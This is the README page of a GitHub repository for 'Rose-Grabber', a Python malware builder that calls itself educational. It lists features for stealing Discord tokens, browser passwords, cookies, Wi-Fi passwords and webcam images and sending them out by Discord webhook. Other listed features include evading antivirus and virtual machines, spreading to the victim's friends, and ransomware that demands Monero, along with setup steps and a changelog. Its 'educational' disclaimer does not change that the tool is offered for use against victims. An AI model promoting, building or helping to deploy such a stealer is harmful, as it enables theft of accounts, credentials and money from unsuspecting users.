/Rose-Grabber

Learn & Secure: Educational Discord Token Grabber

Primary LanguagePythonMIT LicenseMIT


R

Join our Discord
DeepSource CodeFactor DeepSource




DISCORD TOKEN LOGGER WITH LESS DETECTIONS & A BEAUTIFUL BUILDER


 Discord Server 

 Telegram Group 

 gumbobr0t's Telegram 

 pierro on GitHub 

 gumbobr0t on GitHub 

 killer on GitHub 


Features

Feature Description Status
GUI Builder Create user-friendly interfaces easily. Done
UAC Bypass Bypass User Account Control for elevated privileges. Later
Custom Icon Set a unique icon for your application. Done
Runs On Startup Automatically start with Windows. Done
Disables Windows Defender Disable built-in antivirus protection. Later
Anti-VM Detect and evade virtual machine environments. Done
Blocks AV-Related Sites Prevent access to antivirus websites. Later
Melt Stub Make the malware difficult to detect by self-destructing. Done
Fake Error Display fake error messages to deceive users. Done
EXE Binder Combine multiple files into a single executable. Later
File Pumper Inflate file sizes to hide malicious content. Done
Obfuscated Code Use code obfuscation techniques for evasion. Later
Discord Injection Inject code into Discord processes. Done
Steals Discord Tokens Extract user tokens from Discord. Done
Steals Steam Session Gather active Steam sessions. Later
Steals Epic Session Gather active Epic Games sessions. Later
Steals Uplay Session Gather active Uplay sessions. Later
Steals Battle.Net Session Gather active Battle.Net sessions. Later
Steals Passwords From Many Browsers Extract stored passwords. Done
Steals Cookies From Many Browsers Collect browser cookies. Done
Steals History From Many Browsers Access browsing history. Done
Steals Autofills From Many Browsers Extract autofill data. Later
Steals Minecraft Session Files Gather Minecraft session information. Later
Steals Telegram Session Files Extract Telegram session data. Later
Steals Crypto Wallets Target cryptocurrency wallets. Later
Steals Roblox Cookies Gather Roblox-related data. Done
Steals IP Information Collect IP addresses. Done
Steals System Info Gather system-specific details. Done
Steals Saved Wifi Passwords Extract saved Wi-Fi passwords. Done
Steals Common Files Collect files commonly used for attacks. Later
Captures Screenshot Take screenshots of the user's desktop. Done
Captures Webcam Image Access and capture webcam images. Done
Sends All Data Through Discord Webhook Send stolen data to specified destinations. Done
File Type Selection Choose between screensaver or executable. Done
Trigger BSOD Cause a Blue Screen of Death. Later
Freeze Screen Freeze the user's screen. Later
Spread Malware Send malicious messages to friends on social media. Later
Crypto Miner Use the victim's computer for cryptocurrency mining. WIP
Ransomware Forces the victim to pay you a specific amount of USD in Monero or they will lose all their data. Decrypter can be found in components/tools. Done

Disclaimer

This tool is explicitly designed and provided exclusively for educational intentions. Its primary objective is to illuminate the vulnerabilities that files can be susceptible to, highlighting the need for proactive security measures. It is imperative that this tool is never leveraged for any illegal, unauthorized, or malicious undertakings. Under no circumstances will I assume liability for any detrimental consequences inflicted upon your computing infrastructure. I hereby absolve myself from any complicity in activities of an illicit nature. Emphatically, this tool's utility is confined to didactic objectives.

Please be cognizant of the fact that nestled within the intricate architecture of this tool is an elaborate mechanism with latent potential, which, if wielded in an iniquitous manner, could conceivably lead to the illicit acquisition of Discord Nitro privileges through the exploitation of compromised accounts. Nevertheless, I vehemently discourage any endeavor to explore or exploit this covert facet for personal enrichment or unscrupulous exploits. The primary rationale behind divulging this concealed facet is to underscore the paramount importance of fortifying personal data security and adhering to the ethical deployment of technological instruments.

Setup

By virtue of our sophisticated installation process, manual installation of Python is rendered unnecessary. Our meticulously designed batch script adeptly manages this procedure on your behalf.

  • Download the repository by clicking here.
  • Extract the ZIP folder which you just downloaded.
  • Run the install.bat to install Rose and then open the UI. To start the program later on, you will need to run the start.bat.

Preview


For more images click here.

Changelog

Working on crypto miner, rose ransomware & spread malware now.

  • 1.9 (2023-09-12)

    • Rewrote ransomware, changed payment to monero
    • Added ransomware decrypter to components/tools
    • Fixed startup
    • Fixed builder (cleanup, upx, returnzip)
    • Rewrote/Fixed install and start script
  • 1.8 (2023-09-02)

    • Added spread malware on discord feature
    • Added additional error handling
    • Added other UPX compression
    • Added extension spoofer
    • Fixed builder not showing compile CMD
  • 1.7 (2023-08-14)

    • Added ransomware
    • Fixed return zip file
  • 1.6 (2023-08-14)

    • Added Anti-VM
    • Added UAC bypass
    • Added better icon selection in builder
    • Fixed browser stealing
  • 1.5 (2023-08-10)

    • Improved obfuscation and file type selection
    • Added log buttons and file pumper
  • 1.4 (2023-08-09)

    • Added custom icon support and file pumper
    • Fixed Windows Defender detection
  • ...

Credits

Main Developers:

External Contributions:

Love to everyone 💞

Stargazers repo roster for @DamagingRose/Rose-Grabber